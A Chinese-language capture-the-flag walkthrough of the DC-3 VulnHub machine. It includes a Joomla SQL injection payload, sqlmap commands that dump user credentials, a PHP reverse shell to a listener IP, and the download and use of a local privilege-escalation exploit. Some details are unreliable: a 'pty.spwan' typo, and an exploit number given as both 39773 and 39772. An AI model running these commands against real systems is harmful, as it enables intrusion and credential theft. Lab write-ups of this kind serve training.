DC-3

准备工作

在vulnhub官网下载DC:3靶机DC-3

信息收集

nmap -A -T4 -p - 192.168.1.13

发现80端口开放 访问

然后对目录进行扫描

dirsearch -u  http://192.168.1.13

访问发现 REDME.txt
发现是Jomal 3.7 搜索后发现该CMS存在SQL注入漏洞

漏洞利用

Payload：/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

可用，接下来就是用SQLmap跑

sqlmap -u "http://192.168.1.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -Tables

查询 users中的字段

sqlmap -u "http://192.168.1.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]

得到用户名和密码，但是密码加密方式未知，尝试使用工具John the Ripper破解

成功破解
之前有扫描到后台地址 登录一下

在经过一顿翻找后找到上传点。

这处地方可以新建文件，

然后使用蚁剑连接

新建一个PHP文件，访问就会反弹shell，攻击机先进行监听
内容为

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.179.128/4444 0>&1' ");
?>

已经成功获取

使用python反弹shell
python -c 'import pty; pty.spwan("/bin/bash")'

查看系统版本
cat /etc/issue
或者 uname -a

搜索有什么漏洞

对比搜索引擎搜索该版本漏洞，锁定path为39773.txt的漏洞。查看该文件路径
复制到当前目录并查看

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /tmp

下载exp到本地
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

然后用蚁剑上传到目标机器

对压缩包进行解压

   unzip 39772.zip
   tar -xvf exploit.tar

运行脚本

提权成功

获得flag